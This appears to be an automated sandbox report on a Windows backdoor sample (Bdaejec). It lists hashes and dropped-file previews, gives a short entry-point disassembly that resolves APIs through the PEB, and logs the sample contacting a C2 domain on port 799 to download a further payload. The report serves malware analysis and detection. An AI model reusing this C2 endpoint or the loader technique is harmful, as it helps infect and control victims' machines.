                            SHA-512:B2BA1B394E2C9CC6DEADCAF0BD4141583AFD27DD816E4842DDEFA2C4FBD3E3CA140B64402F5D32BFF73ABD0F1C0DAB0B9A5356FE5B3E7E33A8919BE0D7C8F4A6
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                            Process:C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):2389504
                            Entropy (8bit):6.731346075545792
                            Encrypted:false
                            SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                            MD5:DC53BD27CE91101C5040668B0EF35D0C
                            SHA1:1BD78D2A427263E0549455BD0C7D5228F09B9783
                            SHA-256:E61C317DD895D3EB4D7E4622F4802AA3D11913D5EB67B4EE6252AB5870255F3B
                            SHA-512:B95CAC04F29F718E7B605DCAA548D37C629C49004793D2A0A2A01AD5B4844D7E638987A9CB82BD8ED777A6EEE9F92A7CCC23D408AFF5E9817A0C8C9F959ED590
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):31744
                            Entropy (8bit):6.366523743477492
                            Encrypted:false
                            SSDEEP:768:uWQ3655Kv1X/qY1MSd+5QGPL4vzZq2o9W7GsxBbPr:uHqaNrFd+uGCq2iW7z
                            MD5:052A7EA8727A30E4CE34E84D45B9435D
                            SHA1:BAD6FA394BE1DB74660D830E7B4C7C8417EC28B2
                            SHA-256:B579EEBED40C8634C0E5E0346CBDD0571DD75C6180A5587050ADE0851F6BE16E
                            SHA-512:4271F5D4A7C5C11CA4552D651BF462117C24ED455F671AB6E6EB738F0CEE2089DBE6C9C9A1506129366A79480FF7AD3A4732E915F7E70CA4179461DDAA1AC9F1
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9736945451858943
                            Encrypted:false
                            SSDEEP:192:D5O+rua0IdFzU91jM/JXzuiFsZ24IO8x:M+ruhIdFzU91jCzuiFsY4IO8x
                            MD5:66362E4F236E12800E4F783FCBC96B33
                            SHA1:13015B88FFDAA575B74A1EDA4D34947CB5123760
                            SHA-256:428221BF18362AE58BBBF7E04AC5FAA67B422673D2E7D3A3C1B10CF35A10B284
                            SHA-512:EEADD3B1B8CF19C84E8B6B9FF24F4DCE951E4C2E6DCBDFA61E4F9D7FC6C30451C4560C39DDE626E2F0BC2456DCD9770A6AEBF1503F7B1B3D3AD5AE4DE65A7DA8
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.8.7.0.1.6.2.8.3.2.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.8.7.0.2.2.2.2.0.7.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.3.8.4.4.8.4.-.7.0.b.2.-.4.b.a.3.-.a.d.1.0.-.3.9.d.3.6.d.2.c.4.3.d.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.9.8.8.2.6.f.-.9.9.b.c.-.4.b.d.e.-.a.a.4.c.-.a.3.f.6.8.b.f.1.8.b.f.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.g.K.b.P.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.f.c.-.0.0.0.1.-.0.0.1.4.-.c.b.4.3.-.3.b.1.f.1.b.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.9.e.7.7.7.1.b.3.a.e.6.f.c.4.7.8.0.1.9.a.5.9.5.2.5.1.4.6.6.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.s.g.K.b.P.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Sat Dec 28 11:25:01 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):150320
                            Entropy (8bit):1.861230218004245
                            Encrypted:false
                            SSDEEP:768:S/mdWJ9fURAHeQiuEvdkXug3/+M51xTgR2dzSO76d:2GAUOHe0h2M51xTgR2dzSOed
                            MD5:AD7F49AA79498A57A04C86E5BF4D1513
                            SHA1:67CCB4D5D5EA90EE4F40B68E5EDD23C3BBC3383A
                            SHA-256:81A49598C39844E832DD237448E96A8FE7D3BE107BE153056DF0638752B42806
                            SHA-512:D511E2C86C1C0C4B40B69FA5A6D42A0A1F87BD92A0539582AA6DADF6A8E10D96673E3D85214FBEB058D32C0BA0BF2196887D9A52B098BBC8B42A1BAF413CE717
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... .........og............D...............X.......<...$ ...........M..........`.......8...........T............=..............` ..........L"..............................................................................eJ......."......GenuineIntel............T.............og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):6268
                            Entropy (8bit):3.719944911351835
                            Encrypted:false
                            SSDEEP:96:RSIU6o7wVetbFr6YTYW+RogdTY85aMQUt89bPJUrsf4A9JCm:R6l7wVeJFr6eYW+6gzpDt89bCrsftWm
                            MD5:04A70437E22A768C812CF3053E7141CC
                            SHA1:B29E0AF290A57A4271E79D3DDEBEED789585A139
                            SHA-256:F88474374C1838E2CF37F376E3568FAFDFC1E246BA08295751E9EE33366AB72A
                            SHA-512:EACD31EC89C8AE54ADB08A9EB4E58B34F3985E1F3CE8595497114B9E34CC974BF385E6E03AB63057F0DCA4E72A500AF355F0970240ED5B5D9EAC30269FEA1A3A
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.6.4.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4551
                            Entropy (8bit):4.441861462434376
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zs5rJg77aI9UnWpW8VYNYm8M4JE5FqP+q8Ik63gX3d:uIjfrI76W7VhJBP+ggX3d
                            MD5:BD05420E6680730D0DCA1D34C8BE4E1E
                            SHA1:FE1E2D519D3C78318AE994D79D1982F8763A1019
                            SHA-256:B5047AA3AA1E3ED45B23F5D7660A2636186660E3E0DC0F1132724A7E0CAC2499
                            SHA-512:02B4630DF57FAA2B124545C22938D9090641E6FED65BE2BAAC56683B6EFA129F9D7F02339D35D670C74C02F1DFDAC22731F79523725E8451FF95061B4D8555BD
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="651027" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Preview:foo.
                            Process:C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Preview:foo.
                            Process:C:\Users\user\Desktop\yRc7UfFif9.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):15872
                            Entropy (8bit):7.031113762428177
                            Encrypted:false
                            SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                            MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                            SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                            SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                            SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 97%
                            Joe Sandbox View:
                            • Filename: gT6IitwToH.exe, Detection: malicious, Browse
                            • Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse
                            • Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse
                            • Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse
                            • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                            • Filename: ib.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse
                            • Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse
                            • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                            • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.422079676412047
                            Encrypted:false
                            SSDEEP:6144:ESvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN80uhiTw:PvloTMW+EZMM6DFym03w
                            MD5:C9BEC49C2CABA22C9B2209DCE535C3B3
                            SHA1:17648BF896A87CC9A2FB17512BD1588B5CCD9882
                            SHA-256:A2687EFFC3E3D0FEC0F134C3430412ED10D583055BB80227BABED37341D4172D
                            SHA-512:0C1C7A16F8D1FBE2488F797EF2DB22524E891A45703BB79FFD58FB07D7C96234F7976053BB13C69BE4AEBE76F8199F5BBEFA14D7FF7326B46718CA4B6E438127
                            Malicious:false
                            Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..` .Y..............................................................................................................................................................................................................................................................................................................................................#Zw.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.5755407024684445
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:yRc7UfFif9.exe
                            File size:82'432 bytes
                            MD5:7acf6527ef4bef7f7325a94c4d92c1f9
                            SHA1:8c39212f127dfe4c04b05f05b9e6759566ed207a
                            SHA256:69e834be4264dab45e393e63952ae3b65f4e027a5928509c013b16175a43504b
                            SHA512:9b44ea66ed3869c3454ec1882ca6a4d7ea8ff49a3c48908a8c90a48b1b6ca3488920b81a0d499849cdde6e1f4f43a4439bac2e96f819b8d8e626cd8c4b094b93
                            SSDEEP:1536:Yg/6/tM8NXDjPX0QWlfGMckTQlXGCq2iW7z:Hk3U8kTQRGCH
                            TLSH:82838D61B980C073C44A6079441DC7B19F7FBC3126B5C997BB960BBB5F313D1EA2A24A
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S...2...2...2.......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x414000
                            Entrypoint Section:wu
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x518BB101 [Thu May 9 14:21:53 2013 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:ba2c974ed567c90fe365844af978f320
                            Instruction
                            push ebp
                            mov ebp, esp
                            sub esp, 0000016Ch
                            xor eax, eax
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-24h], eax
                            mov dword ptr [ebp-10h], eax
                            mov dword ptr [ebp-14h], eax
                            mov dword ptr [ebp-08h], eax
                            mov dword ptr [ebp-0Ch], eax
                            mov dword ptr [ebp-20h], eax
                            mov dword ptr [ebp-18h], eax
                            mov dword ptr [ebp-48h], 624B6773h
                            mov dword ptr [ebp-44h], 652E6D50h
                            mov dword ptr [ebp-40h], 00006578h
                            mov dword ptr [ebp-3Ch], 00000000h
                            call 00007FCABD2B6E25h
                            pop eax
                            add eax, 00000225h
                            mov dword ptr [ebp-04h], eax
                            mov eax, dword ptr fs:[00000030h]
                            mov dword ptr [ebp-28h], eax
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax], E904C483h
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax+04h], FFFEE3A2h
                            mov eax, dword ptr [ebp-28h]
                            mov eax, dword ptr [eax+0Ch]
                            mov eax, dword ptr [eax+1Ch]
                            mov eax, dword ptr [eax]
                            mov eax, dword ptr [eax+08h]
                            mov ecx, dword ptr [eax+3Ch]
                            mov ecx, dword ptr [ecx+eax+78h]
                            add ecx, eax
                            mov edi, dword ptr [ecx+1Ch]
                            mov ebx, dword ptr [ecx+20h]
                            mov esi, dword ptr [ecx+24h]
                            mov ecx, dword ptr [ecx+18h]
                            add esi, eax
                            add edi, eax
                            add ebx, eax
                            xor edx, edx
                            mov dword ptr [ebp-30h], esi
                            mov dword ptr [ebp-1Ch], edx
                            mov dword ptr [ebp-34h], ecx
                            cmp edx, dword ptr [ebp-34h]
                            jnc 00007FCABD2B6F6Eh
                            movzx ecx, word ptr [esi+edx*2]
                            mov edx, dword ptr [ebx+edx*4]
                            mov esi, dword ptr [edi+ecx*4]
                            add edx, eax
                            mov ecx, dword ptr [edx]
                            add esi, eax
                            cmp ecx, 4D746547h
                            jne 00007FCABD2B6E74h
                            cmp dword ptr [edx+04h], 6C75646Fh
                            jne 00007FCABD2B6E6Bh
                            Programming Language:
                            • [IMP] VS2005 build 50727
                            • [C++] VS2008 build 21022
                            • [ASM] VS2008 build 21022
                            • [ C ] VS2008 build 21022
                            • [LNK] VS2008 build 21022
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xf9340x28.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf4880x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xe0000x140.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xc9ed0xca009c1449c399f02a55d49d67dd9413e89cFalse0.6139193997524752data6.618135871473556IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0xe0000x20680x2200c3c323d1b4244bb08b2144d7f6ccb84fFalse0.349609375data5.290951954639895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x110000x2bc40x10003ecb8d5c354d07019fd9bd96c5e5f3a1False0.20947265625data2.251287542215587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            wu0x140000x50000x420027022e791ba25b0ee9385b003e074038False0.7772253787878788data6.934516547069036IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLLImport
                            KERNEL32.dllGenerateConsoleCtrlEvent, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, SetConsoleCtrlHandler, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, GetStartupInfoA, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, HeapAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, VirtualAlloc, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, HeapSize, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, ReadFile, SetEndOfFile, GetProcessHeap, GetFileAttributesA
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-28T12:24:57.491932+01002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.5551851.1.1.153UDP
                            2024-12-28T12:24:59.104038+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.54970444.221.84.105799TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 28, 2024 12:24:58.006356001 CET49704799192.168.2.544.221.84.105
                            Dec 28, 2024 12:24:58.125968933 CET7994970444.221.84.105192.168.2.5
                            Dec 28, 2024 12:24:58.126077890 CET49704799192.168.2.544.221.84.105
                            Dec 28, 2024 12:24:58.126735926 CET49704799192.168.2.544.221.84.105
                            Dec 28, 2024 12:24:58.246265888 CET7994970444.221.84.105192.168.2.5
                            Dec 28, 2024 12:24:59.103800058 CET7994970444.221.84.105192.168.2.5
                            Dec 28, 2024 12:24:59.103956938 CET7994970444.221.84.105192.168.2.5
                            Dec 28, 2024 12:24:59.104038000 CET49704799192.168.2.544.221.84.105
                            Dec 28, 2024 12:24:59.119354010 CET49704799192.168.2.544.221.84.105
                            Dec 28, 2024 12:24:59.239193916 CET7994970444.221.84.105192.168.2.5
                            Dec 28, 2024 12:25:01.967930079 CET49705799192.168.2.544.221.84.105
                            Dec 28, 2024 12:25:02.087553978 CET7994970544.221.84.105192.168.2.5
                            Dec 28, 2024 12:25:02.087646961 CET49705799192.168.2.544.221.84.105
                            Dec 28, 2024 12:25:03.037431002 CET7994970544.221.84.105192.168.2.5
                            Dec 28, 2024 12:25:03.037462950 CET7994970544.221.84.105192.168.2.5
                            Dec 28, 2024 12:25:03.037506104 CET49705799192.168.2.544.221.84.105
                            Dec 28, 2024 12:25:03.037527084 CET49705799192.168.2.544.221.84.105
                            Dec 28, 2024 12:25:38.472609043 CET49705799192.168.2.544.221.84.105
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 28, 2024 12:24:57.491931915 CET5518553192.168.2.51.1.1.1
                            Dec 28, 2024 12:24:57.998853922 CET53551851.1.1.1192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 28, 2024 12:24:57.491931915 CET192.168.2.51.1.1.10x6e9fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 28, 2024 12:24:57.998853922 CET1.1.1.1192.168.2.50x6e9fNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                            • ddos.dnsnb8.net:799
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.54970444.221.84.1057997164C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            TimestampBytes transferredDirectionData
                            Dec 28, 2024 12:24:58.126735926 CET288OUTGET /cj//k1.rar HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: ddos.dnsnb8.net:799
                            Connection: Keep-Alive


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:06:24:55
                            Start date:28/12/2024
                            Path:C:\Users\user\Desktop\yRc7UfFif9.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\yRc7UfFif9.exe"
                            Imagebase:0x400000
                            File size:82'432 bytes
                            MD5 hash:7ACF6527EF4BEF7F7325A94C4D92C1F9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:06:24:56
                            Start date:28/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            Imagebase:0xc50000
                            File size:15'872 bytes
                            MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 97%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            Target ID:5
                            Start time:06:25:01
                            Start date:28/12/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1468
                            Imagebase:0x680000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:6.6%
